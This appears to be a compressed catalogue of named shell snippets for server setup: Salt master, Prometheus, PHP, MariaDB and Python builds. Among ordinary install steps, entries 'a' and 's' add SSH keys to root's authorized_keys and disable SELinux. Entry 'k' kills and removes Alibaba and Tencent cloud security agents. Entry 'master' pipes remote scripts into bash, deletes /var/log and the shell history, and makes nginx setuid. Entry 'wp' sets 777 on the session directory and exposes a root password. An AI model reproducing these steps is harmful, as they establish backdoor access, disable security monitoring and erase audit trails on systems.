prb pgrep prometheus|xargs kill -9 pgrep blackbox|xargs kill -9 pgrep alertmanager|xargs kill -9 sleep 2 pgrep alertmanager||(/srv/zero/1/prometheus/alertmanager/alertmanager --config.file=/srv/zero/1/prometheus/alertmanager/alertmanager.yml --cluster.listen-address='' --storage.path=/srv/zero/1/prometheus/alertmanager/data &>/srv/zero/1/prometheus/logs/alertmanager.log &) pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &) pgrep prometheus||(/srv/zero/1/prometheus/prometheus --config.file=/srv/zero/1/prometheus/prometheus.yml --storage.tsdb.path=/srv/zero/1/prometheus/data --web.enable-lifecycle &>/srv/zero/1/prometheus/logs/prometheus.log &)
wp yum -y remove webtatic-release-7-3.noarch yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y remove php72w-mysql yum -y install php72w-mysqlnd chmod 777 /var/lib/php/session/ wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress chown nobody.nobody -R /opt/wordpress/phpmyadmin echo "user:root password:io"
php cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y install php72w yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo fi if [ "$OS" = "Debian" ];then apt-get -y install php7.[0-9] apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc fi
e wget -q https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.sh
uuid cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install libuuid-devel fi if [ "$OS" = "Debian" ];then apt-get -y install uuid-dev fi
x cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then rm -f /var/lib/rpm/__db* rpm --rebuilddb yum install -y yum-utils yum clean all yum-complete-transaction --cleanup-only yum history redo last package-cleanup --dupes;package-cleanup --problems yum clean metadata yum makecache yum clean expire-cache fi if [ "$OS" = "Debian" ];then dpkg --configure -a apt-get --fix-broken install apt-key update apt-get -f -y install --allow-unauthenticated --force-yes apt-get clean cd /var/lib/apt&&rm -rf lists;mkdir -p /var/lib/apt/lists/partial apt-get clean apt-get update fi
test echo heloo
minion_clean systemctl stop salt-minion pkill salt-minion &>/dev/null killall salt-minion &>/dev/null pkill salt-minion &>/dev/null rm -fr /etc/salt/pki/minion /var/log/salt/minion* service salt-minion restart
dc curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m) -o /usr/local/bin/docker-compose chmod +x /usr/local/bin/docker-compose
a if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then [ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== local" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys fi if ! grep -q "D70SYXrt" /root/.ssh/authorized_keys &>/dev/null;then [ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCsqDg6fh5HpDUE5BC1orEy4miYe//+Y6JE9o4YLUQZSmMZmLxsr/+HznjHnNBxVHNrlrOR9Y9/+5sdrLRF+mNe4bGpiDzWZHGq9YqyBDLnJG1D0SYd6SFXtel1542LRW2CwUUGWq/O9uF91Kbqgcrc54Dh/2xVQLoN8tSn9D70SYXrtWLEeZWM/0fPJpO5wma+T7WgF9/2n3GVKEnX4xR79Y95OcEV0eFd0jsuJWraudrc7VIXkhEGxD0b3y4KZRZNPJqQnH1gRfrAtk5+vmLDL/fJZw6YWOB44R4oKG/3Vj1I8gsXVXGQwefVft2B/6JAY8m+aiHSp0zAullgmFn ops" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys fi which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
os cat /etc/issue* /etc/*release
file curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist.sh -o /etc/profile.d/filelist.sh yum install axel wget pip3 install rsa pip3 install Crypto pip3 install pycrypto
s if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys fi
python3 yum install -y python3-devel libcurl-devel
k rm -rf /etc/motd &>/dev/null rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null rm -rf /lib/systemd/system/aliyun.service &>/dev/null mkdir /usr/local/{aegis,cloudmonitor,qcloud} killall -9 sgagent &>/dev/null killall -9 barad_agent &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 AliSecureCheckAdvanced &>/dev/null killall -9 CmsGoAgent.linux-amd64 &>/dev/null kill -9 `pidof YDLive` &>/dev/null kill -9 `pidof YDService` &>/dev/null kill -9 `pidof wrapper` &>/dev/null kill -9 `pidof AliYunDun` &>/dev/null kill -9 `pidof AliYunDunUpdate` &>/dev/null
mysql cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo yum -y install mariadb mariadb-server systemctl start mariadb systemctl enable mariadb mysql_secure_installation fi if [ "$OS" = "Debian" ];then apt-get -y install mysql-server fi
master curl -s xabc.io/b|bash curl -s xabc.io/v|bash yum -y install epel-release yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync [ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local timedatectl set-timezone Asia/Shanghai hostnamectl --static set-hostname master-44.192.95.161; systemctl disable firewalld curl -s xabc.io/py3b|bash yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum clean expire-cache yum -y install salt-master yum -y install salt-ssh yum -y install ansible /usr/bin/pip3 install redis==3.5.3 flask cryptography==3.1 pyinotify systemctl enable iptables.service systemctl enable salt-master.service [ -d /opt/sys ]||mkdir -p /opt/sys [ -d /opt/master ]||mkdir -p /opt/master [ -d /srv/salt ]||mkdir -p /srv/salt [ -d /srv/reactor ]||mkdir -p /srv/reactor [ -d /etc/sysconfig ]||mkdir -p /etc/sysconfig [ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin [ -d /root/.pip ]||mkdir -p /root/.pip [ -d /srv/pillar ]||mkdir -p /srv/pillar [ -d /root/.xabc ]||mkdir -p /root/.xabc [ -d /etc/ansible ]||mkdir -p /etc/ansible [ -d /srv/salt/src ]||mkdir -p /srv/salt/src [ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d [ -d /srv/salt/files ]||mkdir -p /srv/salt/files [ -d /srv/salt/group ]||mkdir -p /srv/salt/group [ -d /etc/salt/master.d ]||mkdir -p /etc/salt/master.d [ -d /srv/salt/base/files ]||mkdir -p /srv/salt/base/files [ -d /srv/salt/open/files ]||mkdir -p /srv/salt/open/files [ -d /srv/zero/1/webhook ]||mkdir -p /srv/zero/1/webhook [ -d /srv/zero/1/prometheus/rules ]||mkdir -p /srv/zero/1/prometheus/rules [ -d /srv/zero/1/prometheus/conf/node ]||mkdir -p /srv/zero/1/prometheus/conf/node [ -d /srv/zero/1/prometheus/conf/http ]||mkdir -p /srv/zero/1/prometheus/conf/http [ -d /srv/zero/1/prometheus/conf/ping ]||mkdir -p /srv/zero/1/prometheus/conf/ping [ -d /srv/zero/1/prometheus/conf/tcp ]||mkdir -p /srv/zero/1/prometheus/conf/tcp wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabc.sh -O /etc/profile.d/xabc.sh wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/pip.conf -O /root/.pip/pip.conf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.bashrc -O /root/.bashrc wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/telnet.py -O /usr/local/bin/telnet.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabcdl -O /usr/local/bin/xabcdl wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/redis/redis-cli -O /usr/local/bin/redis-cli wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/redisdl -O /usr/local/bin/redisdl wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/Saltfile -O /etc/salt/Saltfile wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/reactor.conf -O /etc/salt/master.d/reactor.conf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/redis.conf -O /srv/zero/2/redis/conf/redis.conf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/nginx.conf -O /srv/zero/0/openresty/nginx/conf/nginx.conf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/rc.local -O /etc/rc.d/rc.local wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/xabc-sysctl.conf -O /etc/sysctl.d/xabc.conf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/genkey.py -O /opt/sys/genkey.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/kk.py -O /srv/zero/bin/kk.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/air.py -O /srv/zero/bin/air.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/sentinel.py -O /srv/zero/bin/sentinel.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/webhook.py -O /srv/zero/1/webhook/webhook.py wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.prometheus.yml -O /srv/salt/files/.prometheus.yml wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/.alertmanager.yml -O /srv/salt/files/.alertmanager.yml wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/top.sls -O /srv/salt/top.sls wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/pillar_top.sls -O /srv/pillar/top.sls wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/custom.sls -O /srv/salt/base/custom.sls wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/conf.py -O /srv/zero/1/webhook/conf.py for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz;do wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/$i -O -|tar xzf - -C /srv/salt/src;done ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local [ -e /srv/salt/base/files/cluster_id_rsa ]||/opt/sys/genkey.py id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py [ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key rm -rf /var/log /var/cache/salt/minion /root/.bash_history;mkdir -p /var/log echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root pgrep redis-server||/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf /srv/zero/bin/air.py
py3b if ! type python3 &>/dev/null;then cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then if [ ! -d "/usr/local/lib/python3.8" ];then echo doing... wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/lib-python3.8.tgz -O -|tar xzf - -C /usr/local/lib wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/include-python3.8.tgz -O -|tar xzf - -C /usr/local/include wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip3.8 -O /usr/local/bin/pip3.8 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/python3.8 -O /usr/local/bin/python3.8 chmod +x /usr/local/bin/pip3.8 /usr/local/bin/python3.8 ln -s /usr/local/bin/python3.8 /usr/local/bin/python3 source /etc/profile echo "done" fi fi fi
runner yum install git -y #curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64 #chmod +x /usr/local/bin/gitlab-runner #gitlab-runner install --user=root --working-directory=/root #gitlab-runner start #gitlab-runner register
py3 cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl yum -y install zlib-devel libffi-devel openssl-devel fi if [ "$OS" = "Debian" ];then apt -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential apt -y install zlib1g-dev libffi-devel libssl-dev fi #PYTHON_VER=3.8.3 PYTHON_VER=3.9.2 mkdir -p /tmp/build&&cd /tmp/build wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/python/Python-$PYTHON_VER.tgz -O -|tar xzf - cd Python-$PYTHON_VER #./configure --enable-optimizations ./configure make && make install pip3 install bson markdown pyaml pyyaml numpy pymongo redis uvloop pip3 install aiosmtplib pip3 install tornado rm -fr /tmp/build
f salt \* saltutil.refresh_pillar
awscli #yum install -y unzip #https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip rm -rf /tmp/aws curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/aws/awscli-exe-linux-x86_64.zip -o /tmp/awscli-exe-linux-x86_64.zip unzip -q /tmp/awscli-exe-linux-x86_64.zip -d /tmp/ /tmp/aws/install -i ~/.local/aws-cli -b ~/.local/bin
restful 看URL就知道要什么 看http method就知道干什么 看http status code就知道结果如何
debug salt-minion -l debug